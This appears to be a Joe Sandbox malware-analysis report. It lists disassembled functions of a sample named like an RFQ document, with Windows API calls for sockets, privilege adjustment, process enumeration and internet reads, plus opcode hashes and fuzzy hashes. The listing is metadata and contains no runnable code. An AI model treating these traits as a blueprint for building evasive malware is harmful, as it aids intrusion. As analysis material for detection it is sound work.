                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: f6d9ac66eae9c2a0a1fc50a6e1f7387c65b0d41a86d01f6cb04723719ec65166
                                              • Instruction ID: 36fcb5b6669f9c36393db1a8a0452cb62f451b6f46fe4b84d066d47183f51f94
                                              • Opcode Fuzzy Hash: f6d9ac66eae9c2a0a1fc50a6e1f7387c65b0d41a86d01f6cb04723719ec65166
                                              • Instruction Fuzzy Hash: 54417F75700210AFEB14AF65DC86FAE77A9AB44720F44805CFA5ABB3D3DB709D018791
                                              Function 001655FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 752e192906c81297cf985c93ec87c51091eddb54fe721159a2117c8a59ea6b03
                                              • Instruction ID: 8b581ced2afbec5c5b541f8f0424b6e9ce1af658bdd8ae7ab0963d27427bf638
                                              • Opcode Fuzzy Hash: 752e192906c81297cf985c93ec87c51091eddb54fe721159a2117c8a59ea6b03
                                              • Instruction Fuzzy Hash: 1311C172300A116FE7211F26EC44A6FBB9AFF54761F858039F806E7252CB709D52CAA5
                                              Function 0014C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0014C69D
                                              • CoCreateInstance.OLE32(00172D6C,00000000,00000001,00172BDC,?), ref: 0014C6B5
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • CoUninitialize.OLE32 ref: 0014C922
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 7db6d70707e71228f9a456352b9d79d4ca8c3d37323c33012be250da904e05a2
                                              • Instruction ID: 5ce99ab94486e53b0ea70071e0316e2043103b22faa0d37c12b7bc0f90b134fb
                                              • Opcode Fuzzy Hash: 7db6d70707e71228f9a456352b9d79d4ca8c3d37323c33012be250da904e05a2
                                              • Instruction Fuzzy Hash: E9A11CB1104245AFD700EF65CC91EABB7E8EF94704F04496CF156A71A2EB70EA49CB92
                                              Function 0015C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00121D88,?), ref: 0015C312
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0015C324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                              • API String ID: 2574300362-1816364905
                                              • Opcode ID: 64b5be0ea18a79b48ac62236a274303321eae3ae78f32ef94705efe2a04d4f36
                                              • Instruction ID: 0eb110bfdc6b25bdc30e3bfa939d43d09e6d6981a8117292fe39a0cba26c62c8
                                              • Opcode Fuzzy Hash: 64b5be0ea18a79b48ac62236a274303321eae3ae78f32ef94705efe2a04d4f36
                                              • Instruction Fuzzy Hash: D6E01274600717CFDB605F25EC44A8676E4FF09756B80C43DECA5D6650E7B4D885CBA0
                                              Function 000F3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf
                                              • String ID:
                                              • API String ID: 674341424-0
                                              • Opcode ID: 4c26f83ee74eae9d821aa8adeeb8a3a8a320eed448e4cf226d02377d106765bd
                                              • Instruction ID: 949efa827b1b8e2d755352edd023118a5b267b992b01ae0e9c09554ad57a6cca
                                              • Opcode Fuzzy Hash: 4c26f83ee74eae9d821aa8adeeb8a3a8a320eed448e4cf226d02377d106765bd
                                              • Instruction Fuzzy Hash: A122BE715083559FC724DF24C881BAFB7E4BF84710F14492DFA9697292DB70EA04DB92
                                              Function 0015F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0015F151
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0015F15F
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                              • Process32NextW.KERNEL32(00000000,?), ref: 0015F21F
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0015F22E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 39135be5c78d0136b6eebc6323d579062c0412d4942e95498341430e7cdf2bed
                                              • Instruction ID: 29926f1f960677bd4487634ac454e73a82f760bcc0e43da9ddbca48737bf14cd
                                              • Opcode Fuzzy Hash: 39135be5c78d0136b6eebc6323d579062c0412d4942e95498341430e7cdf2bed
                                              • Instruction Fuzzy Hash: 9D515E715083419FD310EF25DC85EABB7E8FF94710F14482DF995A72A2EB70A909CB92
                                              Function 0013EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0013EB19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: a41eab5af74528c39531a08720d056d786b5bd54d5ed596c253e94f505fc994e
                                              • Instruction ID: 6b7cd7c542bb9313d0f9efc36de44b2db0834f8de2a7d7dbe8c003fb5ec0c640
                                              • Opcode Fuzzy Hash: a41eab5af74528c39531a08720d056d786b5bd54d5ed596c253e94f505fc994e
                                              • Instruction Fuzzy Hash: F5320275A007059FDB29CF29C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB44
                                              Function 001525E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001526D5
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0015270C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: f0b4b17906e632a76455fd8d5d7f7969a96c8e5473a31ab9855c33e6722df664
                                              • Instruction ID: b2bf8c5323148de4b76d117b593f4ba3a11e84d9cbed8038d25a0e663124d492
                                              • Opcode Fuzzy Hash: f0b4b17906e632a76455fd8d5d7f7969a96c8e5473a31ab9855c33e6722df664
                                              • Instruction Fuzzy Hash: 43411972600209FFEB20DF54DC85EBB77BCEB55716F10406EFE11AA140EBB09D499650
                                              Function 0014B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014B5AE
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0014B608
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0014B655
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: aa355edc8964d0e44757a0d8d4ee80230c13e4c70743dde62b3932e3f3fbe75b
                                              • Instruction ID: c4554a96a10c6277b7c3915cc2708d20680a1bbd228fa33deb19e0573430ec95
                                              • Opcode Fuzzy Hash: aa355edc8964d0e44757a0d8d4ee80230c13e4c70743dde62b3932e3f3fbe75b
                                              • Instruction Fuzzy Hash: C1216075A00518EFCB00EF65DC80AEDBBB8FF49314F1580A9E805AB361DB31A956CB51
                                              Function 00138CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                              • GetLastError.KERNEL32 ref: 00138D47
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: 3d1cce811de0c61c01f61e59125f91adf84d30d3437a8b88d55c7dc57a4b3e17
                                              • Instruction ID: 1e664814e07f62df474566dffdeb5d5da50f1e1e4bf3848323eea6473de79782
                                              • Opcode Fuzzy Hash: 3d1cce811de0c61c01f61e59125f91adf84d30d3437a8b88d55c7dc57a4b3e17
                                              • Instruction Fuzzy Hash: 6F118FB2414309AFE7289F54EC85D6BB7B9FB44710B20852EF49697641EB70AC418A60
                                              Function 00144021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0014404B
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00144088
                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00144091
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 521b7d9e3d90d96073aeed640cee444012cdccfd3e1afbfba1cccb1bc431cd55
                                              • Instruction ID: 5c1ae3255041801df5977cb3d73a4ea2f6b8d5fdc33db14a39d4a5cc09c2c975
                                              • Opcode Fuzzy Hash: 521b7d9e3d90d96073aeed640cee444012cdccfd3e1afbfba1cccb1bc431cd55
                                              • Instruction Fuzzy Hash: 391130B1904228BFE7109BE8DC44FABBBBCEB09750F10065ABA05E71A1D2B4595587A1
                                              Function 00144C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00144C2C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00144C43
                                              • FreeSid.ADVAPI32(?), ref: 00144C53
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 1903a3456b5413cbfcdffa27c6b82e3f8e138ea7c3c0cf7254aa1be8bb6633ce
                                              • Instruction ID: a843619db3e805b5453b29de9510d6e94e142576c91eff7933b3b526564f7964
                                              • Opcode Fuzzy Hash: 1903a3456b5413cbfcdffa27c6b82e3f8e138ea7c3c0cf7254aa1be8bb6633ce
                                              • Instruction Fuzzy Hash: 52F04975A1130CBFDF04DFF0ED89AAEBBBDEF08201F1044A9E901E2581E7B06A448B50
                                              Function 000EE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 318ec937691826a57990791211b0aafee1de19a55ad9f268d9d7e6e88662a727
                                              • Instruction ID: 118da611bc1dedb30a893239c1a0dc32b5f28547bc698b4a42a6811c7694461a
                                              • Opcode Fuzzy Hash: 318ec937691826a57990791211b0aafee1de19a55ad9f268d9d7e6e88662a727
                                              • Instruction Fuzzy Hash: 7222C270A0029ACFDB24DF55D484ABEB7F0FF08300F148469E896AB396D775AD85CB91
                                              Function 0014C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014C966
                                              • FindClose.KERNEL32(00000000), ref: 0014C996
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: e0308178ffabac1ea2cff58e0e5d6a2b21f7bc2adba2c3f7693c409e187d9da5
                                              • Instruction ID: 868fac0099830fb5bbcb2c1baa2d728442ce24d543960006b0f8a125e3ba6a13
                                              • Opcode Fuzzy Hash: e0308178ffabac1ea2cff58e0e5d6a2b21f7bc2adba2c3f7693c409e187d9da5
                                              • Instruction Fuzzy Hash: E51184726106009FD710EF29D845A6AF7E9FF94324F04851EF8A9D73A1DB70AC01CB81
                                              Function 0014A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0015977D,?,0016FB84,?), ref: 0014A302
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0015977D,?,0016FB84,?), ref: 0014A314
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: fe8113cb1a9928b739033a7a7e142d15e7fdb1bf5849188ddade1d882a82392f
                                              • Instruction ID: 9cb64fa88fcedaf498a07e6596d3f44743a568fde0e0d3a127badd26c8783aa6
                                              • Opcode Fuzzy Hash: fe8113cb1a9928b739033a7a7e142d15e7fdb1bf5849188ddade1d882a82392f
                                              • Instruction Fuzzy Hash: 30F0E23518822DBBDB109FA4CC48FEA736DBF08761F004269F918D2191E7709940CBA1
                                              Function 00138713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00138851), ref: 00138728
                                              • CloseHandle.KERNEL32(?,?,00138851), ref: 0013873A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 00e337a3aaf41d210bf24036e651f51fb82b577c2f0abd64c9fc51a6cf711d85
                                              • Instruction ID: 5afb9a0e5f635d525ea89c45ec512d322a178993745f4a1b4729109e33d241f7
                                              • Opcode Fuzzy Hash: 00e337a3aaf41d210bf24036e651f51fb82b577c2f0abd64c9fc51a6cf711d85
                                              • Instruction Fuzzy Hash: BCE0B676014611EEE7252B60FC09D777BAAEB04350B24882DF4D680874DBA2ACD1DB50
                                              Function 0010A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00108F97,?,?,?,00000001), ref: 0010A39A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0010A3A3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: afcd0b846366429b975940d4d3bf9db341bc7ea606665108c84ca870efda3dd9
                                              • Instruction ID: 3d0363cbce769c8e245680afccfe46d7c1bb2d8451b88d2147f51ce8fd3b74e7
                                              • Opcode Fuzzy Hash: afcd0b846366429b975940d4d3bf9db341bc7ea606665108c84ca870efda3dd9
                                              • Instruction Fuzzy Hash: 68B09231058208ABCA002B91FC09B883F68FB44AA2F404024F60D84A60EBA25492CA91
                                              Function 0010F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45e9ffb1fc9d37b51c9ddcb751a961c6e3f92ca895cbb0e166eaec62cefe1190
